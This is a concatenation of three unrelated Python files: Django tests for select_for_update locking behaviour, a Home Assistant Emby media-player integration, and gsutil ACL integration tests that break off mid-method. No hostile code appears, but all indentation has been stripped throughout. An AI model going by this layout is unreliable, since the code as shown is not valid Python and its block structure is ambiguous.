with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values('pk'))
self.assertEqual(values, [{'pk': self.person.pk}])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values_list(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values_list('pk'))
self.assertEqual(values, [(self.person.pk,)])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_self_when_self_is_not_selected(self):
"""
select_for_update(of=['self']) when the only columns selected are from
related tables.
"""
with transaction.atomic():
values = list(Person.objects.select_related('born').select_for_update(of=('self',)).values('born__name'))
self.assertEqual(values, [{'born__name': self.city1.name}])
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_nowait_raises_error_on_block(self):
"""
If nowait is specified, we expect an error to be raised rather
than blocking.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'nowait': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_skip_locked_skips_locked_rows(self):
"""
If skip_locked is specified, the locked row is skipped resulting in
Person.DoesNotExist.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'skip_locked': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], Person.DoesNotExist)
@skipIfDBFeature('has_select_for_update_nowait')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_nowait_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE NOWAIT is run on
a database backend that supports FOR UPDATE but not NOWAIT.
"""
with self.assertRaisesMessage(NotSupportedError, 'NOWAIT is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(nowait=True).get()
@skipIfDBFeature('has_select_for_update_skip_locked')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_skip_locked_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE SKIP LOCKED is run
on a database backend that supports FOR UPDATE but not SKIP LOCKED.
"""
with self.assertRaisesMessage(NotSupportedError, 'SKIP LOCKED is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(skip_locked=True).get()
@skipIfDBFeature('has_select_for_update_of')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_of_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE OF... is run on
a database backend that supports FOR UPDATE but not OF.
"""
msg = 'FOR UPDATE OF is not supported on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
Person.objects.select_for_update(of=('self',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_unrelated_of_argument_raises_error(self):
"""
FieldError is raised if a non-relation field is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, born__country, '
'born__country__entity_ptr.'
)
invalid_of = [
('nonexistent',),
('name',),
('born__nonexistent',),
('born__name',),
('born__nonexistent', 'born__name'),
]
for of in invalid_of:
with self.subTest(of=of):
with self.assertRaisesMessage(FieldError, msg % ', '.join(of)):
with transaction.atomic():
Person.objects.select_related('born__country').select_for_update(of=of).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_related_but_unselected_of_argument_raises_error(self):
"""
FieldError is raised if a relation field that is not followed in the
query is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, profile.'
)
for name in ['born__country', 'died', 'died__country']:
with self.subTest(name=name):
with self.assertRaisesMessage(FieldError, msg % name):
with transaction.atomic():
Person.objects.select_related(
'born', 'profile',
).exclude(profile=None).select_for_update(of=(name,)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_model_inheritance_of_argument_raises_error_ptr_in_choices(self):
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): '
'name. Only relational fields followed in the query are allowed. '
'Choices are: self, %s.'
)
with self.assertRaisesMessage(
FieldError,
msg % 'country, country__country_ptr, country__country_ptr__entity_ptr',
):
with transaction.atomic():
EUCity.objects.select_related(
'country',
).select_for_update(of=('name',)).get()
with self.assertRaisesMessage(FieldError, msg % 'country_ptr, country_ptr__entity_ptr'):
with transaction.atomic():
EUCountry.objects.select_for_update(of=('name',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_reverse_one_to_one_of_arguments(self):
"""
Reverse OneToOneFields may be included in of=(...) as long as NULLs
are excluded because LEFT JOIN isn't allowed in SELECT FOR UPDATE.
"""
with transaction.atomic():
person = Person.objects.select_related(
'profile',
).exclude(profile=None).select_for_update(of=('profile',)).get()
self.assertEqual(person.profile, self.person_profile)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_after_from(self):
features_class = connections['default'].features.__class__
attribute_to_patch = "%s.%s.for_update_after_from" % (features_class.__module__, features_class.__name__)
with mock.patch(attribute_to_patch, return_value=True):
with transaction.atomic():
self.assertIn('FOR UPDATE WHERE', str(Person.objects.filter(name='foo').select_for_update().query))
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction(self):
"""
A TransactionManagementError is raised
when a select_for_update query is executed outside of a transaction.
"""
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(Person.objects.all().select_for_update())
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction_only_in_execution(self):
"""
No TransactionManagementError is raised
when select_for_update is invoked outside of a transaction -
only when the query is executed.
"""
people = Person.objects.all().select_for_update()
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(people)
@skipUnlessDBFeature('supports_select_for_update_with_limit')
def test_select_for_update_with_limit(self):
other = Person.objects.create(name='Grappeli', born=self.city1, died=self.city2)
with transaction.atomic():
qs = list(Person.objects.all().order_by('pk').select_for_update()[1:2])
self.assertEqual(qs[0], other)
@skipIfDBFeature('supports_select_for_update_with_limit')
def test_unsupported_select_for_update_with_limit(self):
msg = 'LIMIT/OFFSET is not supported with select_for_update on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
list(Person.objects.all().order_by('pk').select_for_update()[1:2])
def run_select_for_update(self, status, **kwargs):
"""
Utility method that runs a SELECT FOR UPDATE against all
Person instances. After the select_for_update, it attempts
to update the name of the only record, save, and commit.
This function expects to run in a separate thread.
"""
status.append('started')
try:
# We need to enter transaction management again, as this is done on
# per-thread basis
with transaction.atomic():
person = Person.objects.select_for_update(**kwargs).get()
person.name = 'Fred'
person.save()
except (DatabaseError, Person.DoesNotExist) as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
connection.close()
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_block(self):
"""
A thread running a select_for_update that accesses rows being touched
by a similar operation on another connection blocks correctly.
"""
# First, let's start the transaction in our thread.
self.start_blocking_transaction()
# Now, try it again using the ORM's select_for_update
# facility. Do this in a separate thread.
status = []
thread = threading.Thread(
target=self.run_select_for_update, args=(status,)
)
# The thread should immediately block, but we'll sleep
# for a bit to make sure.
thread.start()
sanity_count = 0
while len(status) != 1 and sanity_count < 10:
sanity_count += 1
time.sleep(1)
if sanity_count >= 10:
raise ValueError('Thread did not run and block')
# Check the person hasn't been updated. Since this isn't
# using FOR UPDATE, it won't block.
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Reinhardt', p.name)
# When we end our blocking transaction, our thread should
# be able to continue.
self.end_blocking_transaction()
thread.join(5.0)
# Check the thread has finished. Assuming it has, we should
# find that it has updated the person's name.
self.assertFalse(thread.is_alive())
# We must commit the transaction to ensure that MySQL gets a fresh read,
# since by default it runs in REPEATABLE READ mode
transaction.commit()
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Fred', p.name)
@skipUnlessDBFeature('has_select_for_update')
def test_raw_lock_not_available(self):
"""
Running a raw query which can't obtain a FOR UPDATE lock raises
the correct exception
"""
self.start_blocking_transaction()
def raw(status):
try:
list(
Person.objects.raw(
'SELECT * FROM %s %s' % (
Person._meta.db_table,
connection.ops.for_update_sql(nowait=True)
)
)
)
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
# Connection cannot be closed on Oracle because cursor is still
# open.
if connection.vendor != 'oracle':
connection.close()
status = []
thread = threading.Thread(target=raw, kwargs={'status': status})
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update')
@override_settings(DATABASE_ROUTERS=[TestRouter()])
def test_select_for_update_on_multidb(self):
query = Person.objects.select_for_update()
self.assertEqual(router.db_for_write(Person), query.db)
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_with_get(self):
with transaction.atomic():
person = Person.objects.select_for_update().get(name='Reinhardt')
self.assertEqual(person.name, 'Reinhardt')
def test_nowait_and_skip_locked(self):
with self.assertRaisesMessage(ValueError, 'The nowait option cannot be used with skip_locked.'):
Person.objects.select_for_update(nowait=True, skip_locked=True)
def test_ordered_select_for_update(self):
"""
Subqueries should respect ordering as an ORDER BY clause may be useful
to specify a row locking order to prevent deadlocks (#27193).
"""
with transaction.atomic():
qs = Person.objects.filter(id__in=Person.objects.order_by('-id').select_for_update())
self.assertIn('ORDER BY', str(qs.query))
|
|
"""
Support to interface with the Emby API.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.emby/
"""
import logging
from datetime import timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.media_player import (
MEDIA_TYPE_TVSHOW, MEDIA_TYPE_VIDEO, SUPPORT_NEXT_TRACK, SUPPORT_PAUSE,
SUPPORT_SEEK, SUPPORT_STOP, SUPPORT_PREVIOUS_TRACK, MediaPlayerDevice,
SUPPORT_PLAY, PLATFORM_SCHEMA)
from homeassistant.const import (
CONF_HOST, CONF_API_KEY, CONF_PORT, CONF_SSL, DEVICE_DEFAULT_NAME,
STATE_IDLE, STATE_OFF, STATE_PAUSED, STATE_PLAYING, STATE_UNKNOWN)
from homeassistant.helpers.event import (track_utc_time_change)
from homeassistant.util import Throttle
import homeassistant.util.dt as dt_util
REQUIREMENTS = ['pyemby==0.2']
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=10)
MIN_TIME_BETWEEN_FORCED_SCANS = timedelta(seconds=1)
MEDIA_TYPE_TRAILER = 'trailer'
DEFAULT_PORT = 8096
_LOGGER = logging.getLogger(__name__)
SUPPORT_EMBY = SUPPORT_PAUSE | SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK | \
SUPPORT_STOP | SUPPORT_SEEK | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_HOST, default='localhost'): cv.string,
vol.Optional(CONF_SSL, default=False): cv.boolean,
vol.Required(CONF_API_KEY): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
})
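# An illustrative configuration.yaml entry matching the schema above (values are
# placeholders, not from the original source):
#   media_player:
#     - platform: emby
#       host: 192.168.1.10
#       api_key: YOUR_EMBY_API_KEY
#       ssl: false
#       port: 8096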
def setup_platform(hass, config, add_devices_callback, discovery_info=None):
"""Setup the Emby platform."""
from pyemby.emby import EmbyRemote
_host = config.get(CONF_HOST)
_key = config.get(CONF_API_KEY)
_port = config.get(CONF_PORT)
if config.get(CONF_SSL):
_protocol = "https"
else:
_protocol = "http"
_url = '{}://{}:{}'.format(_protocol, _host, _port)
_LOGGER.debug('Setting up Emby server at: %s', _url)
embyserver = EmbyRemote(_key, _url)
emby_clients = {}
emby_sessions = {}
track_utc_time_change(hass, lambda now: update_devices(), second=30)
@Throttle(MIN_TIME_BETWEEN_SCANS, MIN_TIME_BETWEEN_FORCED_SCANS)
def update_devices():
"""Update the devices objects."""
devices = embyserver.get_sessions()
if devices is None:
_LOGGER.error('Error listing Emby devices.')
return
new_emby_clients = []
for device in devices:
if device['DeviceId'] == embyserver.unique_id:
continue  # skip the server's own session and keep processing the remaining devices
if device['DeviceId'] not in emby_clients:
_LOGGER.debug('New Emby DeviceID: %s. Adding to Clients.',
device['DeviceId'])
new_client = EmbyClient(embyserver, device, emby_sessions,
update_devices, update_sessions)
emby_clients[device['DeviceId']] = new_client
new_emby_clients.append(new_client)
else:
emby_clients[device['DeviceId']].set_device(device)
if new_emby_clients:
add_devices_callback(new_emby_clients)
@Throttle(MIN_TIME_BETWEEN_SCANS, MIN_TIME_BETWEEN_FORCED_SCANS)
def update_sessions():
"""Update the sessions objects."""
sessions = embyserver.get_sessions()
if sessions is None:
_LOGGER.error('Error listing Emby sessions')
return
emby_sessions.clear()
for session in sessions:
emby_sessions[session['DeviceId']] = session
update_devices()
update_sessions()
class EmbyClient(MediaPlayerDevice):
"""Representation of a Emby device."""
# pylint: disable=too-many-arguments, too-many-public-methods,
def __init__(self, client, device, emby_sessions, update_devices,
update_sessions):
"""Initialize the Emby device."""
self.emby_sessions = emby_sessions
self.update_devices = update_devices
self.update_sessions = update_sessions
self.client = client
self.set_device(device)
self.media_status_last_position = None
self.media_status_received = None
def set_device(self, device):
"""Set the device property."""
self.device = device
@property
def unique_id(self):
"""Return the id of this emby client."""
return '{}.{}'.format(
self.__class__, self.device['DeviceId'])
@property
def supports_remote_control(self):
"""Return control ability."""
return self.device['SupportsRemoteControl']
@property
def name(self):
"""Return the name of the device."""
return 'emby_{}'.format(self.device['DeviceName']) or \
DEVICE_DEFAULT_NAME
@property
def session(self):
"""Return the session, if any."""
if self.device['DeviceId'] not in self.emby_sessions:
return None
return self.emby_sessions[self.device['DeviceId']]
@property
def now_playing_item(self):
"""Return the currently playing item, if any."""
session = self.session
if session is not None and 'NowPlayingItem' in session:
return session['NowPlayingItem']
@property
def state(self):
"""Return the state of the device."""
session = self.session
if session:
if 'NowPlayingItem' in session:
if session['PlayState']['IsPaused']:
return STATE_PAUSED
else:
return STATE_PLAYING
else:
return STATE_IDLE
# This is nasty. Need to find a way to determine alive
else:
return STATE_OFF
return STATE_UNKNOWN
def update(self):
"""Get the latest details."""
self.update_devices(no_throttle=True)
self.update_sessions(no_throttle=True)
# Check if we should update progress
try:
position = self.session['PlayState']['PositionTicks']
except (KeyError, TypeError):
self.media_status_last_position = None
self.media_status_received = None
else:
position = int(position) / 10000000  # PositionTicks are 100-nanosecond units; convert to seconds
if position != self.media_status_last_position:
self.media_status_last_position = position
self.media_status_received = dt_util.utcnow()
def play_percent(self):
"""Return current media percent complete."""
if self.now_playing_item['RunTimeTicks'] and \
self.session['PlayState']['PositionTicks']:
try:
return int(self.session['PlayState']['PositionTicks']) / \
int(self.now_playing_item['RunTimeTicks']) * 100
except KeyError:
return 0
else:
return 0
@property
def app_name(self):
"""Return current user as app_name."""
# Ideally the media_player object would have a user property.
try:
return self.device['UserName']
except KeyError:
return None
@property
def media_content_id(self):
"""Content ID of current playing media."""
if self.now_playing_item is not None:
try:
return self.now_playing_item['Id']
except KeyError:
return None
@property
def media_content_type(self):
"""Content type of current playing media."""
if self.now_playing_item is None:
return None
try:
media_type = self.now_playing_item['Type']
if media_type == 'Episode':
return MEDIA_TYPE_TVSHOW
elif media_type == 'Movie':
return MEDIA_TYPE_VIDEO
elif media_type == 'Trailer':
return MEDIA_TYPE_TRAILER
return None
except KeyError:
return None
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
if self.now_playing_item and self.media_content_type:
try:
return int(self.now_playing_item['RunTimeTicks']) / 10000000
except KeyError:
return None
@property
def media_position(self):
"""Position of current playing media in seconds."""
return self.media_status_last_position
@property
def media_position_updated_at(self):
"""
When was the position of the current playing media valid.
Returns value from homeassistant.util.dt.utcnow().
"""
return self.media_status_received
@property
def media_image_url(self):
"""Image url of current playing media."""
if self.now_playing_item is not None:
try:
return self.client.get_image(
self.now_playing_item['ThumbItemId'], 'Thumb', 0)
except KeyError:
try:
return self.client.get_image(
self.now_playing_item[
'PrimaryImageItemId'], 'Primary', 0)
except KeyError:
return None
@property
def media_title(self):
"""Title of current playing media."""
# find a string we can use as a title
if self.now_playing_item is not None:
return self.now_playing_item['Name']
@property
def media_season(self):
"""Season of curent playing media (TV Show only)."""
if self.now_playing_item is not None and \
'ParentIndexNumber' in self.now_playing_item:
return self.now_playing_item['ParentIndexNumber']
@property
def media_series_title(self):
"""The title of the series of current playing media (TV Show only)."""
if self.now_playing_item is not None and \
'SeriesName' in self.now_playing_item:
return self.now_playing_item['SeriesName']
@property
def media_episode(self):
"""Episode of current playing media (TV Show only)."""
if self.now_playing_item is not None and \
'IndexNumber' in self.now_playing_item:
return self.now_playing_item['IndexNumber']
@property
def supported_features(self):
"""Flag media player features that are supported."""
if self.supports_remote_control:
return SUPPORT_EMBY
else:
return None
def media_play(self):
"""Send play command."""
if self.supports_remote_control:
self.client.play(self.session)
def media_pause(self):
"""Send pause command."""
if self.supports_remote_control:
self.client.pause(self.session)
def media_next_track(self):
"""Send next track command."""
self.client.next_track(self.session)
def media_previous_track(self):
"""Send previous track command."""
self.client.previous_track(self.session)
|
|
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for the acl command."""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import re
from gslib.command import CreateOrGetGsutilLogger
from gslib.cs_api_map import ApiSelector
from gslib.storage_url import StorageUrlFromString
import gslib.tests.testcase as testcase
from gslib.tests.testcase.integration_testcase import SkipForGS
from gslib.tests.testcase.integration_testcase import SkipForS3
from gslib.tests.util import GenerationFromURI as urigen
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import SetBotoConfigForTest
from gslib.tests.util import unittest
from gslib.utils import acl_helper
from gslib.utils.constants import UTF8
from gslib.utils.retry_util import Retry
from gslib.utils.translation_helper import AclTranslation
PUBLIC_READ_JSON_ACL_TEXT = '"entity":"allUsers","role":"READER"'
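# The substring above matches an entry in the JSON ACL output of the form
# {"entity": "allUsers", "role": "READER"} (formatting shown is illustrative).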
class TestAclBase(testcase.GsUtilIntegrationTestCase):
"""Integration test case base class for acl command."""
_set_acl_prefix = ['acl', 'set']
_get_acl_prefix = ['acl', 'get']
_set_defacl_prefix = ['defacl', 'set']
_ch_acl_prefix = ['acl', 'ch']
_project_team = 'viewers'
@SkipForS3('Tests use GS ACL model.')
class TestAcl(TestAclBase):
"""Integration tests for acl command."""
def setUp(self):
super(TestAcl, self).setUp()
self.sample_uri = self.CreateBucket()
self.sample_url = StorageUrlFromString(str(self.sample_uri))
self.logger = CreateOrGetGsutilLogger('acl')
# Argument to acl ch -p must be the project number, not a name; create a
# bucket to perform translation.
self._project_number = self.json_api.GetBucket(
self.CreateBucket().bucket_name, fields=['projectNumber']).projectNumber
self._project_test_acl = '%s-%s' % (self._project_team,
self._project_number)
def test_set_invalid_acl_object(self):
"""Ensures that invalid content returns a bad request error."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
inpath = self.CreateTempFile(contents=b'badAcl')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, obj_uri],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
def test_set_invalid_acl_bucket(self):
"""Ensures that invalid content returns a bad request error."""
bucket_uri = suri(self.CreateBucket())
inpath = self.CreateTempFile(contents=b'badAcl')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, bucket_uri],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
def test_set_xml_acl_json_api_object(self):
"""Ensures XML content returns a bad request error and migration warning."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
inpath = self.CreateTempFile(contents=b'<ValidXml></ValidXml>')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, obj_uri],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
self.assertIn('XML ACL data provided', stderr)
def test_set_xml_acl_json_api_bucket(self):
"""Ensures XML content returns a bad request error and migration warning."""
bucket_uri = suri(self.CreateBucket())
inpath = self.CreateTempFile(contents=b'<ValidXml></ValidXml>')
stderr = self.RunGsUtil(self._set_acl_prefix + [inpath, bucket_uri],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
self.assertIn('XML ACL data provided', stderr)
def test_set_valid_acl_object(self):
"""Tests setting a valid ACL on an object."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
acl_string = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
inpath = self.CreateTempFile(contents=acl_string.encode(UTF8))
self.RunGsUtil(self._set_acl_prefix + ['public-read', obj_uri])
acl_string2 = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
self.RunGsUtil(self._set_acl_prefix + [inpath, obj_uri])
acl_string3 = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
self.assertNotEqual(acl_string, acl_string2)
self.assertEqual(acl_string, acl_string3)
def test_set_valid_permission_whitespace_object(self):
"""Ensures that whitespace is allowed in role and entity elements."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
acl_string = self.RunGsUtil(self._get_acl_prefix + [obj_uri],
return_stdout=True)
acl_string = re.sub(r'"role"', r'"role" \n', acl_string)
acl_string = re.sub(r'"entity"', r'\n "entity"', acl_string)
inpath = self.CreateTempFile(contents=acl_string.encode(UTF8))
self.RunGsUtil(self._set_acl_prefix + [inpath, obj_uri])
def test_set_valid_acl_bucket(self):
"""Ensures that valid canned and XML ACLs work with get/set."""
if self._ServiceAccountCredentialsPresent():
# See comments in _ServiceAccountCredentialsPresent
return unittest.skip('Canned ACLs orphan service account permissions.')
bucket_uri = suri(self.CreateBucket())
acl_string = self.RunGsUtil(self._get_acl_prefix + [bucket_uri],
return_stdout=True)
inpath = self.CreateTempFile(contents=acl_string.encode(UTF8))
self.RunGsUtil(self._set_acl_prefix + ['public-read', bucket_uri])
acl_string2 = self.RunGsUtil(self._get_acl_prefix + [bucket_uri],
return_stdout=True)
self.RunGsUtil(self._set_acl_prefix + [inpath, bucket_uri])
acl_string3 = self.RunGsUtil(self._get_acl_prefix + [bucket_uri],
return_stdout=True)
self.assertNotEqual(acl_string, acl_string2)
self.assertEqual(acl_string, acl_string3)
def test_invalid_canned_acl_object(self):
"""Ensures that an invalid canned ACL returns a CommandException."""
obj_uri = suri(self.CreateObject(contents=b'foo'))
stderr = self.RunGsUtil(self._set_acl_prefix +
['not-a-canned-acl', obj_uri],
return_stderr=True,
expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn('Invalid canned ACL', stderr)
def test_set_valid_def_acl_bucket(self):
"""Ensures that valid default canned and XML ACLs works with get/set."""
bucket_uri = self.CreateBucket()
# Default ACL is project private.
obj_uri1 = suri(self.CreateObject(bucket_uri=bucket_uri, contents=b'foo'))
acl_string = self.RunGsUtil(self._get_acl_prefix + [obj_uri1],
return_stdout=True)
# Change it to authenticated-read.
self.RunGsUtil(
self._set_defacl_prefix +
['authenticated-read', suri(bucket_uri)])
# Default object ACL may take some time to propagate.
@Retry(AssertionError, tries=5, timeout_secs=1)
def _Check1():
obj_uri2 = suri(self.CreateObject(bucket_uri=bucket_uri,
contents=b'foo2'))
acl_string2 = self.RunGsUtil(self._get_acl_prefix + [obj_uri2],
return_stdout=True)
self.assertNotEqual(acl_string, acl_string2)
self.assertIn('allAuthenticatedUsers', acl_string2)
_Check1()
# Now change it back to the default via XML.
inpath = self.CreateTempFile(contents=acl_string.encode(UTF8))
self.RunGsUtil(self._set_defacl_prefix + [inpath, suri(bucket_uri)])
# Default object ACL may take some time to propagate.
@Retry(AssertionError, tries=5, timeout_secs=1)
def _Check2():
obj_uri3 = suri(self.CreateObject(bucket_uri=bucket_uri,
contents=b'foo3'))
acl_string3 = self.RunGsUtil(self._get_acl_prefix + [obj_uri3],
return_stdout=True)
self.assertEqual(acl_string, acl_string3)
_Check2()
def test_acl_set_version_specific_uri(self):
"""Tests setting an ACL on a specific version of an object."""
bucket_uri = self.CreateVersionedBucket()
# Create initial object version.
uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data')
# Create a second object version.
inpath = self.CreateTempFile(contents=b'def')
self.RunGsUtil(['cp', inpath, uri.uri])
# Find out the two object version IDs.
lines = self.AssertNObjectsInBucket(bucket_uri, 2, versioned=True)
v0_uri_str, v1_uri_str = lines[0], lines[1]
# Check that neither version currently has public-read permission
# (default ACL is project-private).
orig_acls = []
for uri_str in (v0_uri_str, v1_uri_str):
acl = self.RunGsUtil(self._get_acl_prefix + [uri_str], return_stdout=True)
self.assertNotIn(PUBLIC_READ_JSON_ACL_TEXT,
self._strip_json_whitespace(acl))
orig_acls.append(acl)
# Set the ACL for the older version of the object to public-read.
self.RunGsUtil(self._set_acl_prefix + ['public-read', v0_uri_str])
# Check that the older version's ACL is public-read, but newer version
# is not.
acl = self.RunGsUtil(self._get_acl_prefix + [v0_uri_str],
return_stdout=True)
self.assertIn(PUBLIC_READ_JSON_ACL_TEXT, self._strip_json_whitespace(acl))
acl = self.RunGsUtil(self._get_acl_prefix + [v1_uri_str],
return_stdout=True)
self.assertNotIn(PUBLIC_READ_JSON_ACL_TEXT,
self._strip_json_whitespace(acl))
# Check that reading the ACL with the version-less URI returns the
# original ACL (since the version-less URI means the current version).
acl = self.RunGsUtil(self._get_acl_prefix + [uri.uri], return_stdout=True)
self.assertEqual(acl, orig_acls[0])
def _strip_json_whitespace(self, json_text):
return re.sub(r'\s*', '', json_text)
def testAclChangeWithUserId(self):
change = acl_helper.AclChange(self.USER_TEST_ID + ':r',
scope_type=acl_helper.ChangeType.USER)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'UserById', self.USER_TEST_ID)
def testAclChangeWithGroupId(self):
change = acl_helper.AclChange(self.GROUP_TEST_ID + ':r',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'GroupById', self.GROUP_TEST_ID)
def testAclChangeWithUserEmail(self):
change = acl_helper.AclChange(self.USER_TEST_ADDRESS + ':r',
scope_type=acl_helper.ChangeType.USER)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'UserByEmail', self.USER_TEST_ADDRESS)
def testAclChangeWithGroupEmail(self):
change = acl_helper.AclChange(self.GROUP_TEST_ADDRESS + ':fc',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'OWNER', 'GroupByEmail', self.GROUP_TEST_ADDRESS)
def testAclChangeWithDomain(self):
change = acl_helper.AclChange(self.DOMAIN_TEST + ':READ',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'GroupByDomain', self.DOMAIN_TEST)
def testAclChangeWithProjectOwners(self):
change = acl_helper.AclChange(self._project_test_acl + ':READ',
scope_type=acl_helper.ChangeType.PROJECT)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'Project', self._project_test_acl)
def testAclChangeWithAllUsers(self):
change = acl_helper.AclChange('AllUsers:WRITE',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'WRITER', 'AllUsers')
def testAclChangeWithAllAuthUsers(self):
change = acl_helper.AclChange('AllAuthenticatedUsers:READ',
scope_type=acl_helper.ChangeType.GROUP)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
change.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'AllAuthenticatedUsers')
remove = acl_helper.AclDel('AllAuthenticatedUsers')
remove.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHasNo(acl, 'READER', 'AllAuthenticatedUsers')
def testAclDelWithUser(self):
add = acl_helper.AclChange(self.USER_TEST_ADDRESS + ':READ',
scope_type=acl_helper.ChangeType.USER)
acl = list(AclTranslation.BotoBucketAclToMessage(self.sample_uri.get_acl()))
add.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHas(acl, 'READER', 'UserByEmail', self.USER_TEST_ADDRESS)
remove = acl_helper.AclDel(self.USER_TEST_ADDRESS)
remove.Execute(self.sample_url, acl, 'acl', self.logger)
self._AssertHasNo(acl, 'READ', 'UserByEmail', self.USER_TEST_ADDRESS)
def testAclDelWithProjectOwners(self):
